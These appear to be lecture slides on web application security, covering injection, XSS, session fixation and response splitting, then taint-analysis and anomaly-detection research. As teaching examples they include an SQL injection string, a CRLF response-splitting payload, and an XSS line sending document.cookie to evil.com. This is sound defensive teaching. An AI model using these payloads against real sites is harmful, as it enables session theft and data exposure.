Outline

1. Current web security trend
2. Web technologies
3. Web-based attacks
4. Vulnerability analysis
5. Conclusion
Web Security
As the use of web applications for critical services has increased, attacks against the web have grown as well. A series of characteristics make web applications valuable targets for an attacker:
- web applications are often designed to be widely accessible
- web applications often interface with back-end components containing sensitive data
- the most popular web languages are currently easy enough to allow novices to start their own applications
Trend

In the first half of 2005, Symantec cataloged 1,100 new vulnerabilities affecting web-based applications, representing well over half of all new vulnerabilities.

A statistic from the white paper of the Symantec threat report.
Common Gateway Interface

One of the first mechanisms that enabled dynamic content: the Common Gateway Interface (CGI).
It defines a mechanism that a server can use to interact with external applications.
Disadvantage: a new process must be created and executed for each request.

Server-specific APIs: low initialization cost, and they can perform more general functionality than CGI-based programs.
Disadvantage: writing a program is more complex, as it involves some knowledge of the server's inner workings.
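The CGI mechanism can be sketched as follows. This is an illustrative Python script (a hypothetical example, not from the slides): the server passes request data through environment variables such as QUERY_STRING, spawns a fresh process for every request, and sends the program's stdout back to the client.

```python
#!/usr/bin/env python3
# Illustrative CGI script (hypothetical example, not from the slides).
import os
from urllib.parse import parse_qs

def handle_request(query_string: str) -> str:
    params = parse_qs(query_string)
    name = params.get("name", ["world"])[0]
    body = "<html><body>Hello, %s</body></html>" % name
    # A CGI response starts with headers, then a blank line, then the body.
    return "Content-Type: text/html\r\n\r\n" + body

if __name__ == "__main__":
    # The server sets QUERY_STRING before executing the script.
    print(handle_request(os.environ.get("QUERY_STRING", "")))
```

The per-request process creation visible here is exactly the disadvantage noted above.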
(Figure: a web application framework mediates between the server and the application, taking over tasks such as parameter decoding, session management, and user authentication.)
Embedded Web Application Frameworks

Today, most web application implementations take a middle way between original CGI and server-specific APIs: an interpreter or compiler is used to encode the application's components, and rules are defined that govern the interaction between the server and the application's components.
Web application frameworks are available for a variety of languages, such as PHP, Perl, and Python (interpreted, object-oriented, loosely typed).
A sample PHP program (shown as a figure), with annotations:
- parameters of requests sent through the HTTP GET method are available in the $_GET array
- native support for sessions makes it easy to keep track of users across different requests
- user input is first checked using a validate function
Attacks

Web-based applications have fallen prey to a variety of different attacks that violate different security properties.
This survey focuses on attacks that make applications behave in unforeseen ways to disclose sensitive information or execute commands on behalf of the attacker.
Currently, most attacks against web applications can be ascribed to one class of vulnerabilities: improper input validation.
Interpreter Injection

Many dynamic languages include functions to dynamically compose and interpret code. In PHP:
- include and require: include and evaluate a file as PHP code
- eval, preg_replace (with the /e modifier): evaluate a string as PHP code
- exec, passthru, system, popen, shell_exec, pcntl_exec, proc_open, and the backtick operator: execute their input as a shell command

These allow an attack on the server.
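To make the danger concrete, here is a minimal Python sketch (eval-style evaluation has the same problem as PHP's eval; the whitelist validator is an illustrative mitigation, not a method described in the slides):

```python
import ast

def render_unsafe(expr: str) -> str:
    # Vulnerable: user-controlled input reaches eval() unchecked, so a
    # payload like "__import__('os').system('...')" would run a command.
    return str(eval(expr))

# AST nodes allowed in a plain arithmetic expression (whitelist).
_ALLOWED = (ast.Expression, ast.BinOp, ast.UnaryOp, ast.Constant,
            ast.Add, ast.Sub, ast.Mult, ast.Div, ast.USub)

def render_safe(expr: str) -> str:
    # Safer: parse first and reject anything beyond plain arithmetic.
    tree = ast.parse(expr, mode="eval")
    for node in ast.walk(tree):
        if not isinstance(node, _ALLOWED):
            raise ValueError("disallowed expression")
    return str(eval(compile(tree, "<expr>", "eval")))
```

The whitelist approach mirrors the sanitization idea discussed later: untrusted input must be validated before it may reach an interpreter.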
Sample of interpreter injection in Double Choco Latte: the server uses the menuAction parameter of the URL without fully filtering it, so attacker-supplied input reaches the interpreter.
Filename Injection

Most web languages allow applications to dynamically include files, to interpret their content or present them to users.
E.g., to generate different page content depending on a user's preferences, such as for internationalization purposes.
Because PHP allows for the inclusion of remote files, the code to be added to the application can be hosted on a site under the attacker's control.
A filename injection vulnerability in txtForum: pages are divided into parts, e.g., header, footer, forum view, and can be customized by using different "skins," which are different combinations of colors, fonts, and other presentation parameters.
Setting the skin parameter to http://[attacker-site] leads to the execution of the code at http://[attacker-site]/header.tpl.
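A common mitigation is to never build the include path from raw input. This hypothetical Python sketch (the skin names are invented) maps the user's choice onto a fixed whitelist:

```python
import os

ALLOWED_SKINS = {"default", "dark"}  # hypothetical skin names

def skin_template(skin: str) -> str:
    # Reject anything outside the whitelist, so values such as
    # "http://[attacker-site]" or "../../etc/passwd" never reach the
    # file-inclusion mechanism.
    if skin not in ALLOWED_SKINS:
        raise ValueError("unknown skin")
    return os.path.join("skins", skin, "header.tpl")
```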
Cross-Site Scripting (XSS)

In this attack, an attacker forces a client, typically a web browser, to execute attacker-supplied executable code, typically JavaScript, which runs in the context of a trusted web site.
Sample:
http://www.vulnerable.site/welcome.cgi?name=<script>alert(document.cookie)</script>
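The standard defense is to escape user input before embedding it in HTML. A minimal Python sketch (the page template is invented):

```python
import html

def welcome_page(name: str) -> str:
    # html.escape turns < > & into entities, so a payload like
    # <script>alert(document.cookie)</script> is rendered as text
    # instead of being executed by the browser.
    return "<h1>Welcome, %s!</h1>" % html.escape(name)
```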
Impact of XSS Attacks

XSS is not a harmless flaw!
Against normal users, the attacker gains:
- access to authentication credentials for the web application (cookies, username and password)
- access to personal data (credit card, bank account) and business data (bid details, construction details)
- misuse of the account (e.g., ordering expensive goods)
Against high-privileged users, the attacker gains:
- control over the web application
- control of or access to the web server machine
- control of or access to backend/database systems
SQL Injection

A web-based application has an SQL injection vulnerability when it uses unsanitized user data to compose queries that are later passed to a relational database for evaluation.
This can lead to arbitrary queries being executed on the database with the privileges of the vulnerable application.

$activate = $_GET["activate"];
$result = dbquery("SELECT * FROM new_users " .
                  "WHERE user_code='$activate'");
When the activate parameter is set to the string ' OR 1=1 --, the query returns the content of the entire new_users table:

SELECT * FROM new_users WHERE user_code='' OR 1=1 --
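The standard fix is to keep user data out of the query text entirely by using parameterized queries. A sketch with Python's sqlite3 module (the table contents are invented):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE new_users (user_code TEXT, name TEXT)")
conn.execute("INSERT INTO new_users VALUES ('abc123', 'alice')")

def activate(user_code: str):
    # The driver treats user_code strictly as data, so the payload
    # ' OR 1=1 -- matches no row instead of dumping the whole table.
    cur = conn.execute("SELECT * FROM new_users WHERE user_code = ?",
                       (user_code,))
    return cur.fetchall()
```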
Session Hijacking

HTTP is a stateless protocol: no built-in mechanism allows an application to maintain state throughout a session.
The session state can be maintained in different ways:
- It can be encoded in a document transmitted to the user, such as a cookie or HTML hidden form fields, and sent back as part of later requests. Problem: the cookie or hidden fields may be changed by dishonest users.
- Each user can be assigned a unique session ID. Problem: session fixation.
Session fixation: the attacker sets a user's session ID to one known to him, for example by sending the user an email with a link that contains a particular session ID:

http://[target]/login.php?sessionid=1234
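A common defense against session fixation is to issue a fresh session ID at login, discarding whatever ID the client presented. An illustrative Python sketch (the in-memory store is invented):

```python
import secrets

sessions = {}  # hypothetical in-memory session store

def login(presented_session_id: str, user: str) -> str:
    # Drop the possibly attacker-chosen ID (e.g. "1234" from the
    # fixation URL) and bind the user to a fresh, unguessable ID.
    sessions.pop(presented_session_id, None)
    new_id = secrets.token_hex(16)
    sessions[new_id] = {"user": user}
    return new_id
```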
Response Splitting

The attacker is able to set the value of an HTTP header field so that the resulting response stream is interpreted by the attack target as two responses.
To perform response splitting, the attacker must be able to inject data containing the header termination characters and the beginning of a second header.
This is usually possible when user data is used (unsanitized) to determine the value of an HTTP header.
Example (JSP):

<% response.sendRedirect("/by_lang.jsp?lang=" +
       request.getParameter("lang")); %>

Normally the server responds with:

Location: http://vulnerable.com/by_lang.jsp?lang=en_US

However, if the lang parameter is set to:

dummy%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2019%0d%0a%0d%0a<html>New document</html>

the decoded CR/LF sequences terminate the first response and start a second one containing the attacker's document.
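Since the attack hinges on smuggling CR/LF into a header value, a simple mitigation is to reject those characters after URL-decoding. A hedged Python sketch (the redirect path mirrors the JSP example above):

```python
from urllib.parse import unquote

def redirect_location(lang: str) -> str:
    # Decode %0d/%0a first, then refuse header-terminator characters:
    # without CR/LF the response stream stays a single message.
    value = unquote(lang)
    if "\r" in value or "\n" in value:
        raise ValueError("CR/LF not allowed in header value")
    return "/by_lang.jsp?lang=" + value
```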
Response splitting is often related to web cache poisoning. Two conditions must hold:
- a caching proxy server interprets the response stream as containing two documents
- it associates the second document with the original request
Then the attacker is able to insert into the proxy's cache a page of his choice in association with a URL of the vulnerable application.
Vulnerability analysis

Vulnerability analysis refers to the process of assessing the security of an application through auditing of either the application's code or its behavior for possible security problems.
The identification of vulnerabilities in web applications can be performed following one of two orthogonal detection approaches: the negative (vulnerability-based) approach and the positive (behavior-based) approach.
Detection approaches

Negative approach: builds abstract models of known vulnerabilities and then matches the models against web-based applications to identify instances of the modeled vulnerabilities.
Positive approach: builds models of the normal behavior of an application (e.g., using machine-learning techniques) and then analyzes the application's behavior to identify any abnormality that might be caused by a security violation.
Two fundamental analysis techniques can be used: static analysis and dynamic analysis.
Static analysis: provides a set of pre-execution techniques for predicting dynamic properties of the target program. It does not require the application to be deployed and executed.
Dynamic analysis: consists of a series of checks to detect vulnerabilities and prevent attacks at run-time. It is less prone to false positives, since the analysis is done at run-time.
In practice, hybrid approaches mixing both static and dynamic techniques are frequently used to combine the strengths and minimize the limitations of the two.
Negative approach: taint propagation

Most negative approaches assume that vulnerabilities are the result of insecure data flow in applications. The goal is to identify when untrusted user input propagates to security-critical functions (sinks) without being properly checked and sanitized.
Taint propagation: data from input is marked as tainted, and its propagation throughout the program is traced to check whether it can reach sinks.
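The idea can be sketched in a few lines of Python (an illustrative toy, not any of the tools surveyed): sources mark data as tainted, sanitizers clear the mark, and sinks refuse tainted values.

```python
class Tainted(str):
    """A string carrying a taint mark."""

def source(raw: str) -> str:
    # e.g. an HTTP request parameter: always tainted.
    return Tainted(raw)

def sanitize(value: str) -> str:
    # e.g. validation or escaping; returns an untainted plain str.
    return str(value)

def sink(value: str) -> str:
    # e.g. a query or output function: rejects tainted input.
    if isinstance(value, Tainted):
        raise ValueError("tainted data reached a sink")
    return value
```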
Negative static approaches

Static analysis can be applied before deployment and does not require modification of the deployment environment.
Current work focuses on the analysis of applications written in PHP and Java.
It may require the source code of the web application to perform the analysis.
WebSSARI (WWW '04)

WebSSARI is one of the first works that applies taint propagation analysis to web security.
It targets three types of vulnerabilities: cross-site scripting, SQL injection, and general script injection.
The tool uses a flow-sensitive, intra-procedural analysis based on a lattice model and typestate.
Typestate: PHP's type system is extended with two types, tainted and untainted, and the tool keeps track of the typestate of variables. To untaint tainted data, the data has to be processed by a sanitization routine or cast to a safe type.
WebSSARI predefines three files:
- a file with preconditions for all sensitive functions (the sinks)
- a file with known sanitization functions (for untainting)
- a file specifying all possible sources of untrusted input
When the tool finds that tainted data reaches a sink, it automatically inserts sanitization routines.
Example (control flow graph with typestate):

if (A) {
    A = X;
} else {
    if (B) {
        A = Y;
    } else {
        A = Z;
    }
}
echo(A);

With X and Z tainted (T) and Y untainted (U), the branches assign A the typestates T, U, and T. At the merge point before echo(A), the typestate of A is T = LUB(T, U, T): at every program point, the algorithm keeps a static invariant representing the most dangerous possible state at that point.
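The merge operation can be sketched as follows (an illustrative Python fragment of the two-element lattice, not WebSSARI's implementation):

```python
TAINTED, UNTAINTED = "T", "U"

def lub(*states: str) -> str:
    # Least upper bound on the {untainted < tainted} lattice: the
    # merged state is tainted if any incoming path is tainted, i.e.
    # the most dangerous possible state at that point.
    return TAINTED if TAINTED in states else UNTAINTED
```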
• Typestate offers a balance between precision and cost
• Maintaining a typestate for every diverging path increases precision but induces memory cost
• Merging typestates at execution merge points limits memory cost but induces imprecision and denies counterexample support
• WebSSARI incorporates flow-sensitive typing based on typestate
Runtime Protection

Different sanitization routines are automatically inserted just before vulnerable function calls. Depending on the vulnerable function, one of the three following routines is inserted:
- HTML output sanitization
- database command sanitization
- system command sanitization
Problems of WebSSARI:
- It uses an intra-procedural algorithm and thus only models information flows that do not cross function boundaries (Xie & Aiken, USENIX Security '06).
- All dynamic variables and arrays are considered tainted, reducing the accuracy of the analysis.
- It cannot accurately track arrays, aliases, and object-oriented code (Pixy, Oakland '06).
Summary

Static analysis heavily depends on language-specific parsers. This is not generally a problem for general-purpose languages, but web applications use dynamic scripting languages and complex data structures, such as arrays and hashes, that are hard to track.
One main drawback of static analysis is its susceptibility to false positives caused by inevitable analysis imprecision.
Precise evaluation of sanitization routines is even more difficult: regular expressions alone may not be enough.
Dynamic negative approaches

Dynamic negative techniques are also based on taint analysis: untrusted sources, sensitive sinks, and taint propagation still need to be modeled.
Instead of running the analysis on source code, the program or interpreter is extended to collect the information, and tainted data is tracked during execution.
Perl's taint mode: when the Perl interpreter is invoked with the -T option, it makes sure that no data obtained from the outside environment can be used in security-critical functions (too conservative).
"Automatically Hardening Web Applications Using Precise Tainting" (SEC '05)

Proposes a modification of the PHP interpreter to dynamically track tainted data in PHP programs. The approach is fully automated and aware of application semantics. The standard PHP interpreter is replaced with a modified interpreter that:
- keeps track of which information comes from untrusted sources (precise tainting)
- checks how untrusted input is used
(Figure: PHPrevent architecture. The client's request passes through the web server to the modified PHP interpreter, which mediates access to the file system (file.php), the database, and system APIs.)
Coarse-Grained Tainting

Provided by many scripting languages (Perl, Ruby): untrusted input is tainted, and everything touched by tainted data becomes tainted.

$query = "SELECT real_name FROM users WHERE user = '" . $user . "' AND pwd = '" . $pwd . "'";

The entire $query string is tainted.
Precise Tainting

Untrusted input is tainted, but taint markings are maintained at the character level, following the semantics of the program: only really tainted data is tainted.

$query = "SELECT real_name FROM users WHERE user = '" . $user . "' AND pwd = '" . $pwd . "'";

After an injection attempt, only the attacker-supplied characters carry taint marks:

$query = "SELECT real_name FROM users WHERE user = '' OR 1 = 1; -- ';' AND pwd = '' ";
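Character-level tainting can be sketched as strings that carry one taint bit per character (an illustrative toy, not the paper's modified PHP interpreter):

```python
class TStr:
    def __init__(self, chars: str, taint: list):
        self.chars, self.taint = chars, taint

    @staticmethod
    def literal(s: str) -> "TStr":
        # Program text: untainted.
        return TStr(s, [False] * len(s))

    @staticmethod
    def user_input(s: str) -> "TStr":
        # Data from the request: every character tainted.
        return TStr(s, [True] * len(s))

    def __add__(self, other: "TStr") -> "TStr":
        # Concatenation preserves per-character taint, so only the
        # attacker-controlled part of a query stays marked.
        return TStr(self.chars + other.chars, self.taint + other.taint)
```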
Precise Checking

Wrappers around PHP functions handle updating and checking the precise taint information.
Conservative: no false negatives while minimizing false positives; behavior only changes when an attack is likely.
Preventing SQL Injection

Parse the query using the SQL parser to identify interpreted text. Disallow SQL keywords or delimiters in interpreted text that is tainted: the query is not sent to the database, and an error response is returned.

"SELECT real_name FROM users WHERE user = '' OR 1 = 1; -- ';' AND pwd = '' ";
Preventing PHP Injection

Disallow tainted data in functions that treat input strings as PHP code or manipulate system state; wrappers are placed around these functions to enforce this rule. The phpBB attack is prevented by wrappers around preg_replace.
Preventing Cross-Site Scripting

Wrappers around output functions buffer the output and then parse the tainted output with HTML Tidy. The defense takes advantage of precise tainting information to identify web page output generated from untrusted sources. Dangerous content is determined by examining the HTML grammar, and is sanitized by removing tags.

<b>Hello</b> (safe)
<b onmouseover='location.href="http://evil.com/steal.php?" + document.cookie'>Hello</b> (unsafe)
Summary of dynamic negative methods

A modified interpreter can be applied to all web applications; all required information is available during execution, and no complex analysis (for features such as aliasing) is required.
However, it provides no guarantees covering all cases.
Summary of negative methods

If taint propagation is done statically, precision depends heavily on the ability to deal with the complexities of dynamic language features; precise evaluation of sanitization routines is especially important.
If taint propagation analysis is done dynamically, on the other hand, issues of analysis completeness, application stability, and performance arise.
Positive Approaches

Based on deriving models of the "normal" behavior of an application. Assumptions: deviations indicate attacks or vulnerabilities; attacks create an anomalous manifestation.
An anomaly detection system uses a number of statistical models to identify anomalous events in a set of web requests that use parameters to pass values to the server-side components of a web-based application.
Anomaly-based detection

Based on the assumption that normal traffic can be defined and that attack patterns will differ from such "normal" traffic; this difference should be expressible quantitatively.
An anomaly-based detection system goes through a learning phase to register such "normal" traffic. Analysis is done for individual field attributes as well as for the entire query string.
"Anomaly Detection of Web-based Attacks," Christopher Kruegel & Giovanni Vigna, CCS '03

It is hard to keep intrusion detection signature sets updated with respect to the large numbers of vulnerabilities discovered daily.
This paper presents an intrusion detection system that uses a number of different anomaly detection techniques to detect attacks against web servers and web-based applications.
The system takes as input web server log files conforming to the Common Log Format and produces an anomaly score for each web request.
Data Model

Only GET requests with no request body are considered:

169.229.60.105 - johndoe [6/Nov/2002:23:59:59 -0800] "GET /scripts/access.pl?user=johndoe&cred=admin" 200 2122

Only the query string is used, not the path. For a query q with attributes a1=v1 and a2=v2, Sq = {a1, a2}.
Detection model

Each model m is associated with a weight wm and returns a probability pm. A value of pm close to 0 indicates an anomalous event, while a value close to 1 indicates a normal one.
If the weighted score is greater than the detection threshold determined during the learning phase for that parameter, the anomaly detector considers the entire request anomalous and raises an alert.
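The combination step can be sketched as a weighted sum in Python (illustrative; the formula sums wm * (1 - pm), consistent with low pm meaning anomalous, and the threshold is invented):

```python
def anomaly_score(probs, weights):
    # Each model m returns a probability p_m that the observed value
    # is normal; a low p_m contributes a large share of its weight.
    return sum(w * (1.0 - p) for p, w in zip(probs, weights))

def is_anomalous(probs, weights, threshold):
    return anomaly_score(probs, weights) > threshold
```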
Some of the attributes that can be analyzed are:
- input length
- character distribution
- parameter string structure
- parameter absence or presence
- order of parameters
Attribute Length

Normal parameters are fixed-size tokens (session identifiers) or short strings (input from HTML forms), so length does not vary much for parameters associated with a given program. Malicious activity, e.g., a buffer overflow payload, does.
Goal: approximate the actual but unknown distribution of the parameter lengths and detect deviations from the normal.
Learning & Detection

Learning: calculate the mean and variance of the lengths l1, l2, ..., ln of the parameter values in the N queries processed.
Detection: apply the Chebyshev inequality. This bound is deliberately (very) weak, resulting in a high degree of tolerance: only obvious outliers are flagged as suspicious.
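A sketch of the length model in Python (illustrative; the data is invented). Chebyshev's inequality bounds p(|l - mean| >= t) by variance / t^2, which is deliberately weak:

```python
def learn_lengths(lengths):
    n = len(lengths)
    mean = sum(lengths) / n
    var = sum((l - mean) ** 2 for l in lengths) / n
    return mean, var

def length_prob(l, mean, var):
    # Chebyshev bound on observing a length at least this far from
    # the mean; only gross outliers receive a small probability.
    dist = (l - mean) ** 2
    if dist == 0:
        return 1.0
    return min(1.0, var / dist)
```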
Attribute character distribution

Attributes have a regular structure and mostly printable characters, and there are similarities between the character frequencies of query parameters. The relative character frequencies of the attribute are sorted in descending order to obtain the idealized character distribution (ICD).
Normal: frequencies slowly decrease in value.
Malicious: frequencies drop extremely fast (a peak caused by a single dominating character) or nearly not at all (random values).
Example: "passwd" has character codes 112 97 115 115 119 100, giving sorted relative frequencies 0.33 0.17 0.17 0.17 0.17 and 0 for all remaining characters: ICD(0) = 0.33, ICD(1) to ICD(4) = 0.17, ICD(5) and onward = 0.
Why is it useful?

It cannot be evaded by some well-known attempts to hide malicious code in the string, e.g., substituting nop operations with instructions of similar behavior (add rA,rA,0).
But it is not useful when the attack causes only a small change in the payload's character distribution.
Learning and detection

Learning: for each query attribute, its character distribution is stored; the ICD is obtained by averaging all the stored character distributions.

q1:  .5   .25  .25  0    0
q2:  .75  .2   .1   0    0
q3:  .25  .25  .25  .25  0
avg: .5   .22  .2   .08  0
Detection: Pearson chi-square test. It is not necessary to operate on all values of the ICD; a small number of intervals (bins) is considered.
Calculate observed and expected frequencies: Oi = observed frequency of each bin; Ei = relative frequency of each bin × length of the attribute.
Compute the chi-square value, then derive the probability from a predefined chi-square table.
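Both steps can be sketched in Python (illustrative; the bin boundaries are invented and may differ from the paper's):

```python
from collections import Counter

def char_distribution(s):
    # Sorted relative character frequencies, padded to 256 entries.
    counts = Counter(s)
    freqs = sorted((c / len(s) for c in counts.values()), reverse=True)
    return freqs + [0.0] * (256 - len(freqs))

def learn_icd(samples):
    # Idealized character distribution: average over training samples.
    dists = [char_distribution(s) for s in samples]
    return [sum(col) / len(dists) for col in zip(*dists)]

BINS = [(0, 1), (1, 4), (4, 7), (7, 12), (12, 16), (16, 256)]

def chi_square(s, icd):
    observed = char_distribution(s)
    stat = 0.0
    for lo, hi in BINS:
        o = sum(observed[lo:hi]) * len(s)   # observed count in bin
        e = sum(icd[lo:hi]) * len(s)        # expected count in bin
        if e > 0:
            stat += (o - e) ** 2 / e
    return stat  # look up against a chi-square table to get a probability
```

A single-character payload ("AAAA...") concentrates all mass in the first bin and yields a much larger statistic than a normal value.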
Structural inference

The structure of a parameter is the regular grammar that describes all of its normal, legitimate values.
Why? An attacker can craft an attack so that its manifestation appears more regular; for example, non-printable characters can be replaced by groups of printable characters.
Learning and detection

The basic approach is to generalize the grammar as long as it seems reasonable, and to stop before too much structural information is lost. A Markov model (a probabilistic NFA) and Bayesian probabilities are used.
Each state S has a set of ns possible output symbols o, which are emitted with probability ps(o). Each transition t is marked with a probability p(t), the likelihood that the transition is taken.
(Figure: example Markov model with Start and Terminal states, emitting symbols a, b, c with probabilities such as p(a) = 0.5, p(b) = 0.5, p(a) = 1, p(c) = 1, p(b) = 1, and transition probabilities 1.0, 0.4, 0.7, 0.3, 0.2.)

The probability of the word 'ab' is the sum over all paths that emit it:
P(w) = (1.0 * 0.3 * 0.5 * 0.2 * 0.5 * 0.4) + (1.0 * 0.7 * 1.0 * 1.0 * 1.0 * 1.0)
The likelihood of the training data is obtained by adding the probabilities calculated for each input training element. The aim is to maximize the product of the model's probability and this likelihood.
There is a conflict between simple models that tend to over-generalize and models that perfectly fit the data but are too complex:
- a simple model has high probability, but its likelihood of producing the training data is extremely low, so the product is low;
- a complex model has low probability, even though its likelihood of producing the training data is high, so the product is still low.
The model is built up from the input data, with states added using the Viterbi algorithm.
Detection: the problem is that even a legitimate input that has been seen regularly during the training phase may receive a very small probability value, since the probability values of all possible input words sum to 1.
Therefore the model returns 1 if the input is a valid output of the grammar, and 0 when it cannot be derived from the grammar.
Token finder

Determines whether the values of an attribute are drawn from a limited set of possible alternatives (an enumeration).
When a malicious user passes illegal values to the application, the attack can be detected.
Learning and detection

Learning: the attribute is an enumeration when the number of different parameter values is bound by some threshold t; it is random when the number of different argument instances grows proportionally with the number of samples. A statistical correlation is calculated: a value < 0 suggests an enumeration, > 0 suggests randomness.
Detection: if an unexpected value appears in the case of an enumeration, the model returns 0, otherwise 1; in the case of randomness it always returns 1.
Attribute presence or absence

Client-side programs, scripts, or HTML forms pre-process the data and transform it into a suitable request, so legitimate requests contain a regular set of parameters.
Hand-crafted attacks focus on exploiting a vulnerability in the code that processes a certain parameter value, and little attention is paid to the other parameters.
Learning and detection

Learning: build a model of acceptable subsets by recording each distinct subset Sq = {ai, ..., ak} of attributes seen during the training phase.
Detection: for each query, the algorithm looks up the current attribute set; if it was encountered during training, return 1, otherwise 0.
Attribute order

Legitimate invocations of server-side programs often contain the same parameters in the same order; hand-crafted attacks often don't.
The test checks whether the order of a given query is consistent with the model deduced during the learning phase.
Learning and detection

Learning: build a set of attribute pairs O. Each vertex vi in a directed graph G is associated with the corresponding attribute ai. For every query, the ordered list of attributes is processed, and for each attribute pair (as, at) in this list, with s != t and 1 <= s,t <= i, a directed edge is inserted into the graph from vs to vt.
Graph G then contains all order constraints imposed by queries in the training data; an order constraint between two attributes holds when there is a directed edge or path between their vertices.
Detection: given a query with attributes a1, a2, ..., ai and a set of order constraints O, all parameter pairs (aj, ak) with j != k and 1 <= j,k <= i are checked; a violation returns 0, otherwise 1.
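A simplified sketch in Python (illustrative; it records pairwise precedence directly rather than building the graph and handling cycles as the paper does):

```python
def learn_order(training_queries):
    # Record every attribute pair (a, b) where a precedes b.
    constraints = set()
    for attrs in training_queries:
        for i, a in enumerate(attrs):
            for b in attrs[i + 1:]:
                constraints.add((a, b))
    return constraints

def check_order(attrs, constraints):
    # A query violates the model if it reverses a learned constraint
    # that was never observed in the other direction.
    for i, a in enumerate(attrs):
        for b in attrs[i + 1:]:
            if (b, a) in constraints and (a, b) not in constraints:
                return 0
    return 1
```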
Conclusions of this paper

An anomaly-based intrusion detection system for the web that takes advantage of application-specific correlations between server-side programs and the parameters used in their invocation. Parameter characteristics are learned from the input data.
It was tested on data from Google and from two universities in the US and Europe.
Summary of positive approaches

Advantage: by specifying normal behavior, they can detect unknown attacks.
Problems: the concept of normality is difficult to define; they are vulnerable to mimicry attacks; and setting the detection threshold still requires manual intervention and substantial expertise.
Conclusion
No method can be considered "the silver bullet"; many methods combine strengths from various techniques.
It is important to provide techniques to better model sanitization and to assess whether a sanitization operation is appropriate for the task at hand.
Challenges come from novel web-specific attack techniques; improper input validation vulnerabilities are well known and well studied.
There is no standard dataset usable as a baseline for evaluation.
Our future work

To develop static and dynamic methods specifically supporting the detection of XSS script code.
Thank you!